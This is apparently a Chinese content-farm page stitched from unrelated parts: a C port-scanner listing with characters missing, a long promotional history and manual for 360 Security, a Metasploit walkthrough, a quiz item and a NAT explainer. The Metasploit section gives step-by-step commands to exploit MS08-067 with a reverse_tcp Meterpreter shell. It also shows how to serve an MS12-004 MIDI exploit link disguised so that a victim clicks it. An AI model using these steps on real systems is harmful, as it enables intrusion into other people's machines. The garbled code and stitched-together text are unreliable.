用C++编写端口扫描程序
#include stdio.h
#include winsock.h
#define NETWORK_ERROR -1
#define NETWORK_OK 0
#define PORT_MIN 1
#define PORT_MAX 65535
HANDLE hThread;
DWORD hID;
char hostname[30];
int starting_port = 0;
int ending_port = 0;
int nopen = 0;
DWORD portscan();
int main(){
int ret;
WSADATA dat;
DWORD version;
version = MAKEWORD(2,2);
ret = WSAStartup(version,dat);
if(ret != 0){
printf("Error initializing Winsock.\n");
WSACleanup();
return NETWORK_ERROR;
}
if(ret == 0){
printf("Enter hostname:");
scanf("%s",hostname);
printf("Enter starting port:");
scanf("%d",starting_port);
if(starting_port PORT_MIN){
printf("Invalid port number.\n");
WSACleanup();
return NETWORK_ERROR;
}
printf("Enter ending port:");
scanf("%d",ending_port);
if(ending_port PORT_MAX){
printf("Invalid port number.\n");
WSACleanup();
return NETWORK_ERROR;
}
printf("\nScanning [%s]...\n",hostname);
hThread = CreateThread(0,0,(LPTHREAD_START_ROUTINE)portscan,0,0,hID);
if(hThread == 0){
printf("Failed to create thread.\n");
WSACleanup();
return NETWORK_ERROR;
}
sleep(-1);
}
WSACleanup();
return NETWORK_OK;
}
DWORD portscan(){
int i,nret;
SOCKET thesocket;
LPHOSTENT hostent;
thesocket = socket(AF_INET,SOCK_STREAM,IPPROTO_TCP);
hostent = gethostbyname((hostname));
for(i = starting_port;i ending_port+1;++i){
SOCKADDR_IN hostinfo;
hostinfo.sin_family = AF_INET;
hostinfo.sin_addr=*((LPIN_ADDR)*hostent-h_addr_list);
hostinfo.sin_port = htons(i);
nret = connect(thesocket,(LPSOCKADDR)hostinfo,sizeof(hostinfo));
if(nret == 0){
printf("\n\t%d\n",i);
++nopen;
}
}
printf("\nScan complete.\n\n");
printf("Number of ports opened = %d\n",nopen);
closesocket(thesocket);
}
portscan入侵都快烦死了,谁帮我反击一下,求高手
建议你下载个360安全卫士
360安全卫士是2006年6月诞生的国内第一款免费网络安全软件。360安全卫士在不到两年的时间内迅速成长为国内用户使用量第一的网络安全软件,覆盖国内近50%的互联网用户,深受广大网民的喜爱。2008年3月6日,360安全卫士切换新域名,完成了从产品到安全平台的蜕变。2008年3月11日,360安全卫士宣布正式从奇虎公司剥离,单独成立公司进行运作。
360安全卫士的官方网站是,这已经成为广大360用户解决电脑安全问题时最信赖的网站。其中,“360软件百科”(baike.360.cn)是网民共同参与,对软件、进程或者端口进行主题创建、挖掘、评价和交流的网络社区系统。系统中,每一款软件以其名称构成一个主题,大家可以通过投票、评论 来了解每个软件的安全性、优劣和使用方法,找到同类好软件,分享技巧经验。目前,360软件百科全系统共收录有887款软件,广受网民青睐。日均流量在300万次左右,最高日均流量曾突破600万。
360安全卫士是国内最受欢迎免费安全软件,它拥有查杀流行木马、清理恶评及系统插件,管理应用软件,卡巴斯基杀毒,系统实时保护,修复系统漏洞等数个强劲功能,同时还提供系统全面诊断,弹出插件免疫,清理使用痕迹以及系统还原等特定辅助功能,并且提供对系统的全面诊断报告,方便用户及时定位问题所在,真正为每一位用户提供全方位系统安全保护。
其公司在07年与卡巴斯基合作并推广卡巴斯基中国销售并推出了卡巴斯基( 360安全卫士豪华版 ),其卡巴斯基360是360+卡巴斯基单机版的合并。在官方网站上可以下载.
360保险箱是一款提供主动防御功能的软件。在保险箱中,用户运行软件等一系列操作处于安全模式之下,有效防止用户账号或密码被盗取。用户在保险箱中运行网游、QQ、网银等软件时,防止木马等危险进程对目标程序的信息剽窃; 使用电脑中的其他软件时,不会受到该软件的干扰。
360安全浏览器整合了360安全卫士强大的安全防护功能,1.6M的轻小体积适合快速安装。除【超强安全模式】采用的“沙箱”技术外,360安全浏览器还集成了恶意代码智能拦截、下载文件即时扫描、恶意网站自动报警,广告窗口智能过滤等强劲功能,是目前市面上最安全的浏览器。
360ARP防火墙通过在系统内核层拦截ARP攻击数据包,确保网关正确的MAC地址不被篡改,可以保障数据流向正确,不经过第三者,从而保证通讯数据安全、保证网络畅通、保证通讯数据不受第三者控制,完美的解决局域网内ARP攻击问题
360杀毒是360安全中心出品的一款免费杀毒软件。360杀毒具有以下优点:查杀率高、资源占用少、升级迅速等等。同时,360杀毒可以与其他杀毒软件共存,是一个理想杀毒备选方案。当其他杀毒软件无法让您满意的时候,不妨试试免费的360杀毒。
快速升级和响应
病毒特征库小时级升级,确保对爆发性病毒的快速响应
对感染型木马强力的查杀
超低系统资源占用,人性化免打扰设置
系统资源占用极低
独特的游戏模式,畅玩游戏同时安全无忧
功能强大的反病毒引擎以及实时保护技术
强大的反病毒引擎,通过Virus Bulletin等全球多家权威检测机构的认证
采用虚拟环境启发式分析技术发现和阻止未知病毒
一 安装
首先请通过下载最新版本的360杀毒安装程序。
在安装前建议您暂时停止其他安全软件的实时保护功能。因为在安装杀毒软件的时候不可避免的要执行一些注册表的读写操作,个别实时监控可能误报为风险软件。实际上360杀毒发布前会经过严格的测试,对用户没有任何危害,请您放心使用。
下载完成后双击执行安装程序。
点击“下一步”按钮继续安装。
请阅读许可协议,并勾选“我接受使用许可协议中的条款”再点击“下一步”按钮。如果您不同意许可协议,请点击“取消”退出安装。
此时程序会提示您重启计算机,我们建议您保存其他程序(比如:保存正在编辑的文档,保存游戏的进度等)之后点击“是”按钮第一时间重启。但是如果您有其他工作未完成您也可以点击“否”暂不重启。
注意:安装后如果不重启,360杀毒不能正常运行。
重启之后,360杀毒成功的安装到您的计算机上。当您收到可疑的文件时,就可以360杀毒的病毒扫描将病毒木马打回原形了!
二 卸载
360杀毒的卸载很简单。打开开始菜单,找到如图所示的“卸载360杀毒”并运行。
程序会弹出一个对话框,如果您确实要卸载360杀毒,请点击“是”按钮确认继续卸载。
然后会弹出360杀毒卸载工具窗口,点击“卸载”按钮。
因为卸载并重启后还要有一个一次性开机自启动项需要加载,以便彻底清理360杀毒留下的残余文件。如果开启了防火墙可能会报警。卸载程序没有任何危险,请放心执行“允许”动作,针对具体的防火墙可能是“允许”、“忽略”、“跳过”之类的操作。
至此,卸载工作已经完成大半,马上就要重启了,请保存好其他程序(比如:正在编辑的文档)。点击“yes”按钮。系统会自动重启,重启后无需执行操作,360杀毒彻底卸载干净。
三 扫描
360杀毒包括三种扫描模式:快速扫描、全面扫描、自定义扫描
快速扫描包括:内存、引导区、注册表、Cookies和Windows目录下的文件
全面扫描包括:快速扫描的所有项目外加全部磁盘
自定义扫描允许用户扫描指定的文件夹,比如:只扫描注册表、只扫描某个文件夹等等。点击自定义扫描,弹出如图所示的窗口。
窗口左侧的列表是即将扫描的对象,默认会自动扫描“内存”、“启动扇区”、“注册表”、“cookie”。
我们可以通过右侧的“添加”按钮增加要扫描的目录。如果想不扫描某个已添加的对象,可以去掉对象前的“勾”或者选中对象后单击“删除按钮”(默认扫描对象不可删除)。确定之后点击“扫描”按钮即可。
除了以上三种从主界面调用扫描的方法之外,您还可以通过文件的右键菜单调用扫描:右键单击任何一个文件或者文件夹,在弹出的菜单中选择“启用360杀毒扫描”即可调用360杀毒对您选择的文件进行扫描。
四 设置
在主界面右下角点击“设置”按钮,即进入设置界面:
扫描设置:您可以指定扫描的文件类型,扫描全部文件会更彻底一些,不过会多花一些时间,请根据您的实际情况选择。
例外设置:您还可以指定跳过某些目录,通过“浏览”按钮选择文件夹后点击添加即可将文件夹放到跳过的列表中。您也可以从列表中删除某个文件夹。
五 升级
为了及时查杀最新病毒,360杀毒默认每小时自动升级病毒库。您也可以手动升级病毒库,点击360杀毒主窗口右侧的“升级病毒库”按钮
会弹出如下图的升级窗口:
窗口上方用进度条表示当前的升级状态,正常情况下,升级会在几分钟内自动完成,升级窗口提示升级成功:
恭喜你,至此,360杀毒已经可以查杀刚刚出现的新病毒啦!
六 历史记录
360杀毒记录了“扫描”和“升级”操作的历史记录,可以通过主界面右下角的“历史记录”按钮查看。历史记录窗口简单易用:左下角的“清除所有历史记录”功能,会同时清除“扫描”和“升级”的记录。刷新历史列表会重新载入最新的历史记录。点击“确定”按钮会关闭历史记录查看窗口。
七 常见问题FAQ
1. 360杀毒绿色版安装成功之后实时监控功能没有打开?
答:360杀毒绿色版去掉了实时监控功能。
我们主要考虑到您很可能已经安装了其他杀毒软件了,为了避免实时监控功能的冲突以节省您的系统资源,以便让您更流畅的体验我们的产品。
2. 为什么我在安装过程中,**防火墙提示我可能有风险?
答:因为360杀毒在安装的过程中会将必要的软件信息写入注册表,因此部分防火墙可能会提示您是否阻止安装程序。实际上360杀毒发布前我们已经经过了大量的测试,没有任何威胁,您可以放心安装。请点击不同防火墙的“忽略”、“允许”或其他相似含义的按钮以便安装程序顺利进行。
强烈建议:安装前先暂时关闭其他安全软件的实时监控功能!
3. 我已经安装了**杀毒软件,再安装360杀毒会冲突吗?
答:360杀毒绿色版去掉了实时监控功能,因此不但不会与其他杀毒软件冲突,而且是您保护系统安全的有益补充。当其他杀毒软件的扫描结果让您不放心的时候,不妨试试免费的360杀毒吧。
4. 360杀毒支持哪些操作系统?在其他系统上安装360杀毒会有什么问题?
答:360杀毒支持XP(32位)、Vista(32位)。在其他系统上安装360杀毒会出现不可预知的问题,强烈建议不要在其他系统安装。
比如:在Windows 2000下安装360杀毒虽然能安装上,但是无法使用,并且无法卸载。
5. 可以在安装模式下安装360杀毒吗?
答:360杀毒不支持安全模式,请转到正常模式下安装360杀毒。
6. 为什么我无法启动扫描窗口?
答:请下载此软件并安装即可解决此问题
7. 我正在扫描的窗口找不到了怎么办?
答:请使用Alt+Tab快捷键,可以切换到扫描窗口。或者您点击主界面的任何一个扫描按钮可以呼出正在执行的扫描窗口。
编辑本段与BitDefender合作关系说明
7月22日上午消息,360免费杀毒、BitDefender中国区总代理上海软达今日发布与BitDefender合作关系说明,称奇虎360与 BitDefender联合研发免费杀毒产品,而上海软达负责BitDefender产品在中国市场的销售.以下为其声明全文:
关于360免费杀毒、上海软达和BitDefender合作关系的说明
BitDefender是国际领先的反病毒软件厂商,奇虎360与上海软达都是BitDefender的战略合作伙伴,其中奇虎360是直接与BitDefender总部达成的协作.
董事长周鸿祎称,推出免费杀毒的目的不是针对其他杀毒厂商,而是为了降低用户使用杀毒软件的门槛,并不会强制用户使用360杀毒。
拦截恶意钓鱼网站,防网银账户、游戏帐号、QQ帐号丢失
全面查杀9000余款流行木马,370款恶意软件
发布微软官方漏洞信息、修复388个系统漏洞,有效防止恶意软件通过漏洞传播
举报恶意软件,与数百万网友共享软件经验
常用:基本状态 查杀流行木马 清理恶评软件及系统插件 管理应用软件 修复系统漏洞 系统全面诊断 清理使用痕迹装机必备软件
杀毒:杀毒 在线杀毒 病毒专杀工具 恶评插件专杀
高级:修复IE 启动项状态 系统服务状态 系统进程状态 网络连接状态 高级工具集
保护:开启实时保护 保护360
求助:到求助中心 到论坛举报 导出诊断报告
推荐:绿色软件推荐 装机必备软件
360安全卫士适用于windows 5.0/5.1/5.2 系统。也就是说用于Windows2000和基于Win2000框架的WinXP。以及Win2003(但不支持漏洞恢复)
1. 增强系统全面体检,安全隐患一网打尽
漏洞补丁、恶评插件、流行木马……系统全部安全隐患,只需数秒全盘检出。
2. 新增扫描后关机功能,查杀木马更省心
增加扫描木马完成后自动关机功能,服务更贴心。
3. 漏洞补丁支持windowsserver2003,服务器亦可轻松修复系统漏洞
新增对windowsserver2003补丁检测,服务器修复漏洞更轻松。
4. 内附360保险箱,远离帐号问题的困扰
附带360保险箱,从此不再为帐号安全担忧。
5.全新360求助中心,问题解决更快、更方便
系统问题一键提交,众多高手为您解答。
6.最新流行软件推荐,最酷最安全软件快速拥有
新增最新流行软件推荐,最酷最安全软件快速下载,玩酷一夏。
7.360文件知识库智能查询
系统中的诸多文件孰好孰坏?只要有了360文件知识库,自己就能揪出木马病毒。
2008-7-17 360安全卫士v5.0Beta版发布
全新专业级免费杀毒功能,杀毒+杀木马双剑合璧
1.强劲查杀数十万种病毒,与原有木马查杀功能相配合,彻底解决系统安全威胁
2.超低资源占用,人性化游戏免打扰模式,畅玩同时安全无忧
3.病毒特征库每小时级升级,确保对爆发性病毒的快速响应
4.全面隐私保护和控制,阻止恶意软件窃取用户隐私,上网冲浪无忧
5.漏洞补丁支持windowsserver2003,服务器亦可轻松修复系统漏洞
6.新增对windowsserver2003补丁检测,服务器修复漏洞更轻松
7.补丁即下即装,更方便快捷
8.系统全面体检,所有安全隐患一网打尽
9.漏洞补丁、恶评插件、流行木马……全部安全隐患,只需数秒全盘检出
10.新增自动检测设置,无需打开360安全卫士界面亦可了解系统详情
11.最新流行软件推荐,最酷最安全软件快速拥有
12.装机必备热力推荐最新流行软件,安全与酷玩瞬间兼得
13.更多软件详细信息,最全方位预览软件,自由选择
2008-07-04 360安全卫士v4.20正式版发布
1.新增系统全面体检,安全隐患一网打尽漏洞补丁、恶评插件、流行木马……系统全部安全隐患,只需数秒全盘检出
2.最新流行软件推荐,最酷最安全软件快速拥有,新增最新流行软件推荐,最酷最安全软件快速下载,玩酷一夏
3.漏洞补丁即下即装,修复更智能快捷,增强漏洞补丁模块,即下即装,智能修复更快捷方便
4.增强痕迹清理功能,全面保护上网隐私更强劲,清理系统使用痕迹,保护上网隐私同时优化系统速度
5.查杀最新流行木马,更强劲,更彻底全面彻底查杀最新机器狗四代、新型AV终结者等最新最恶劣木马
2008-04-02 360安全卫士V4.1正式版发布
新增自我破坏功能,阻止360安全卫士木马、病毒恶意破坏
阻止360安全卫士对木马、病毒的恶意攻击和破坏,保护系统更安全
360安全卫士V4.0新春正式版
主程序版本:4.0.3.1003 安装包版本:4.0.3.1006
大小:4.63 MB 系统要求:Win2000/XP/VISTA
360安全卫士V4.0新春正式版只有4M左右,适合快速安装。(使用卡巴斯基杀毒功能时,需要手工下载卡巴斯基杀毒软件。)
1、强力网页防漏、第三方软件漏洞检测,彻底截断木马传播渠道 new!
第三方软件漏洞预警,源头遏制机器狗等流行木马入侵系统
超强网页防漏,有效阻截通过IE入侵的木马,保护系统安全
2、装机必备一键搞定,全新安全极速下载平台软件安装无须奔走下载站,360全新推出“无插件,无病毒”软件下载平台。 一键式完成下载、安装、管理全过程。
3、木马查杀独家集成双引擎,查杀效果加倍结合传统型木马特征库精确匹配及主动型智能特征检测两种机制,全面检测系统隐藏木马。 每日木马特征库高效更新,追击查杀机器狗木马等顽固木马。
4、新增修复OFFICE漏洞补丁,全面支持补丁导出、发放,适合网管集中管理全面检测系统漏洞和office漏洞,精确提供系统所需补丁。
对已装补丁全面管理,支持漏洞补丁源程序批量导入/导出,网管集中分发补丁好帮手。
5、ARP防火墙v2.0媲美同类收费软件,局域网攻击从此销声匿迹囊括其它同类收费软件全部功能:双向拦截ARP攻击,拦截IP冲突等经典ARP拦截功能。
更多用户可自定义设置,方便网吧用户免打扰享受保护。
6、全面优化360安全卫士启动速度,速度增快1.5倍全面优化360安全卫士启动速度,更快检测系统基本安全状态。 加入更多检测设置:自动检测方便快捷,手工检测免除打扰。
7、采用独家流行库技术,体积大幅度缩小70%,安装包仅4M左右精简体积,4M的精悍小包快速下载,更省心。
8、增强升级模块,支持每日数次升级,第一时间查杀最新爆发木马。升级模块全面增前,特征库更新更快速,第一时间查杀最新爆发木马。
(使用卡巴斯基杀毒功能时,需要手工下载卡巴斯基杀毒软件。)
2008-02-03 360安全卫士Beta3版发布
第三方软件漏洞预警,源头遏制机器狗等流行木马入侵系统
超强网页防漏,有效阻截通过IE入侵的木马,保护系统安全
2007-12-29 360安全卫士v4.0beta版发布
1. 木马查杀独家集成双引擎,查杀效果加倍
l 结合传统型木马特征库精确匹配及主动型智能特征检测两种机制,全面检测系统隐藏木马。
l 每日木马特征库高效更新,追击查杀Gdwli32盗号木马等顽固木马。
2. 新增修复OFFICE漏洞补丁,全面支持补丁导出、发放,适合网管集中管理
l 全面检测系统漏洞和office漏洞,精确提供系统所需补丁。
l 对已装补丁全面管理,支持漏洞补丁源程序批量导入/导出,网管集中分发补丁好帮手。
3. ARP防火墙v2.0媲美同类收费软件,局域网攻击从此销声匿迹
l 囊括其它同类收费软件全部功能:双向拦截ARP攻击,拦截IP冲突等经典ARP拦截功能。
l 更多用户可自定义设置,方便网吧用户免打扰享受保护。
4. 全面优化360安全卫士启动速度,速度增快1.5倍
l 全面优化360安全卫士启动速度,更快检测系统基本安全状态。
l 加入更多检测设置:自动检测方便快捷,手工检测免除打扰。
5. 采用独家流行库技术,体积大幅度缩小70%,安装包仅3M
l 精简体积,3M的精悍小包快速下载,更省心。
6. 增强升级模块,支持每日数次升级,第一时间查杀最新爆发木马。
l 升级模块全面增前,特征库更新更快速,第一时间查杀最新爆发木马。
2007-10-22 360安全卫士V3.7版发布
融合奇虎360ARP防火墙最新版v1.1,双向拦截ARP攻击,及时查杀本机ARP木马,有效解决局域网内频繁掉线问题
增强木马查杀引擎,及时解决2345.com首页劫持
文件粉碎机功能支持windows vista系统
网页防漏功能,浏览网站更安全
漏洞补丁集中分发,网管好帮手
附赠半年免费卡巴斯基最新KAV7.0
2007-10-22 360安全卫士v3.64版发布
实时保护加入局域网ARP攻击拦截功能 (融入奇虎360ARP防火墙)new!
免费90天全功能体验windows优化大师强劲优化清理功能 new!
文件粉碎机功能支持windows vista系统 new!
增强木马查杀引擎,全面检测QQ游戏邀请大盗木马
网页防漏功能,浏览网站更安全
漏洞补丁集中分发,网管好帮手
附赠半年免费卡巴斯基最新KAV7.0
360安全卫士V3.63标准版
仅6.10MB,适合快速安装。360安全卫士自动下载扩展包并安装卡巴斯基V7.0,方便您的使用。
实时保护功能支持windows vista系统
增强木马查杀引擎,全面查杀arp病毒
升级模块增强,极大提升升级速度
网页防漏功能,浏览网站更安全
漏洞补丁集中分发,网管好帮手
附赠半年免费卡巴斯基最新KAV7.0
编辑本段使用建议
另外使用360安全卫士建议与卡巴斯基杀毒软件或卡巴斯基互联网安全套装配合
由于奇虎网与卡巴斯基实验室合作,虽然用户可多次免费得到卡巴斯基杀毒软件的激活码(半年激活码),本百科不详细说明。但不建议多次免费得到!
通过修改安装目录下的links.ini文件,可以去除卡巴斯基广告,并添加自定义界面。
编辑本段友情提示
安全软件可以说是中国唯一能拿得出手的软件产品了,多少年来,由于盗版问题,中国的软件产业一直处于极度衰弱的状态,应用软件几乎没有人去开发,能开发应用软件的人全去做英文版在国外发布,完全不做中文版;做商业软件的天天被抄袭骚扰;看上去规模大,技术强的软件公司几乎都是血汗工厂,在做外包开发,最知名的应用软件公司金山,基本已经变成了网游公司,由于软件业的商业环境极端恶劣,别说和美国比,就连日本、韩国都比中国强的太多了,想出几家ADOBE、ORCALE这样的企业,在中国是完全不可能。中国足球再臭,还能凑出11个人去踢一场,堂堂一个中国,很难数出几家象样的应用软件公司,甚至多年来形成了一个笑话,只要ADOBE的股票表现不好,就是找中国的广告公司、设计公司打官司挣钱的时候了。
安全软件行业,从技术水准和规模上说,瑞xing是唯一能与国外软件对抗的企业,其他几家要走的路就太长了。360安全卫士,查杀木马靠的是安天的木马防线,这家公司早年间是靠做病毒特征库起家的,产品怎么样,只能说见仁见智;查杀病毒用的是缩水版的BitDefender,麻烦请有点专业精神,安全软件是需要本地化的,这个软件在中国使用的时候误杀严重,连QQ游戏都当成病毒,技术再好,没有本地化,也无法保障中国用户的安全和有效使用,外来的和尚就会念经?
(360安全卫士个性定制)
如何用Metasploit扫描端口
一、调用Nmap进行扫描
进入msf命令行后直接输入nmap –v –sVip(具体命令和nmap一样)
二、MSF模块扫描
Use auxiliary/scanner/postscan/syn
先用搜索命令搜索有关端口扫描的工具:searchportscan
我们使用Use auxiliary/scanner/postscan/syn
看一下参数配置 showoptions
我们先来设置一下网卡
Set INTERFACE eth0
设置一下扫描的端口,我们这里来扫描80:set PORTS 80
设置扫描目标RHOSTS :set RHOSTS 119.63.37.149
在设置一下线程:set THREADS 100
看一下我们设置好的
这时候我们都设置好了,我们来攻击下,看看效果,用命令run进行攻击
缺点就是扫描的速度有点慢啊
MetaSploit SMB扫描获取系统信息
还是搜索一下smb:searchsmb
这次发现搜出来很多,我们用这个模块
Use auxiliary/scanner/smb/smb_version
看一下需要设置的参数
设定目标ip:set RHOSTS 192.168.188.140
在设置一下线程:set THREAD 10
然后run一下,查看结果
直接扫描出来小伙伴的系统还有主机名,速度不到1s,很快
也可以批量扫描设置批量扫描目标即可 set RHOSTS 192.168.188.50-200
MetaSploit服务识别
我们这里对SSH和FTP进行识别
在这里使用这个模块:use auxiliary/scanner/ssh/ssh_version
然后我们设置一下参数,这里讲设置好的参数截图看一下
Run一下看看结果,其实没有扫出来,好像是屏蔽了,但是用nmap却扫出来了ssh
在试一下ftp,用这个模块:use auxiliary/scanner/ftp/ftp_version
设置下参数
可以看到结果,也没有扫描出来;
MetaSploit SNMP扫描与枚举
搜索一下snmpuse auxiliary/scanner/snmp/snmp_login
看一下他的参数设置
这个参数还是很多的
设定一下目标
然后在run一下
枚举用这个模块
use auxiliary/scanner/snmp/snmp_enum
设置好目标和线程后run一下就可以
MetaSploit远程代码执行
搜索一下08-067,使用这个攻击载荷
use exploit/windows/smb/ms08_067_netapi
同样来看一下参数设置
我们只要设置一下目标就可以,然后我们需要一个载荷来反弹shell
set payload windows/meterpreter/reverse_tcp
然后设置参数
将LHOST 设置为自己的ip(对外攻击不要忘了段口转发)
比如说知道对面的系统是什么版本,可以指定targer,用target查看一下都有什么版本
设置一下目标,假设我们目标机器的系统为10:set target 10
这时候,我们再来看一下其参数设置,发现比以前完备了好多
08-067是不会自动识别系统版本的,但是其他的可以自动识别,所以用其他攻击载荷的时候可以不用设置
然后输入exploit进行攻击即可
这时候会出来一个meterpreter
我们在里面输入shell,就会反弹一个shell
这样整个攻击过程就完成了
MetaSploit MIDI文件解析远程代码执行
还是来搜索12-004
设置下本机ip set SRVHOST ip
然后攻击
会生成一个连接,但是这个链接容易让人发现,所以我们可以伪装下ip利用URIPATH参数就可以伪装
在设置时,会发现报红,因为4444端口被占用了,所以我们改下监听端口 set LPORT 5555
然后生成连接
只要目标点了这个链接,那么我们就会上线一个shell
说一下,目标点击后我们这边并没有反映,我们需要输下session查看当前会话,会找到上线的机子,连接上线的机子
Session –I 1(id)
然后输入shell就可以拿到shell
以下不是扫描软件的是(选择题)
A.当今最流行的扫描工具之一SATAN(1)
1. SATAN 介绍
SATAN 的英文名为 Security Administrator Tool For Analyzing Networks,翻译成中文为:安全管理员的网络分析工具。
B.sniffer 来扫描无线网络中传输的数据包关键是要完成无线网卡的升级工作,只有选择并找到合适的驱动程序才能够顺利完成升级工作并实现对无线网络数据的扫描和监听。
C.ISS公司开发和维护的商业漏洞扫描程序,它的可移植性和灵活性很强,众多的UNIX的平台上都可以运行ISS。
D.PortScan是一款端口扫描器,PortScan可以帮助用户寻找到当前网络上正在运行的所有设备,PortScan拥有200多个线程,是企业用户扫描IP地址的首选扫描应用。
路由器里有“启用Fullcone NAT" 是什么意思?
Full Cone (完全锥型)NAT:所有来自同一个内部Tuple X的请求均被NAT转换至同一个外部Tuple Y,而不管这些请求是不是属于同一个应用或者是多个应用的。
除此之外,当X-Y的转换关系建立之后,任意外部主机均可随时将Y中的地址和端口作为目标地址和目标端口,向内部主机发送UDP报文,由于对外部请求的来源无任何限制,因此这种方式虽然足够简单,但却不那么安全。
在此类型NAT后面的终端C向服务器S发起连接时,NAT会为C分配一个端口p,并将p与C绑定映射关系。此后,无论请求是否来自S,只要是发送到p端口的,NAT都会将其转发给C。
扩展资料
NAT,即网络地址转换,可以让多台上网设备共享一个IP。它的原理大概是:当一个封装了私有IP和端口的数据包经过NAT,NAT就会把私有IP和端口映射成公有IP和端口,然后重新封包再转发出去
同时NAT也会记录源私有地址与源公有地址以及目的地址这三个的映射关系,当目的地址回包时,NAT查找以前的记录,转换成私有地址。
事实上,大部分的上网设备都处在NAT之后,而我们照样上网不误。进一步说,用户的请求到达服务器,其源IP与端口是经NAT转换后的公有IP与端口,服务器回包是往NAT的公有IP发送,最后可以顺利到达NAT后面的上网设备。这就说明,数据包可以直接发往NAT转换后的公有地址。
参考资料:百度百科 - NAT
0条大神的评论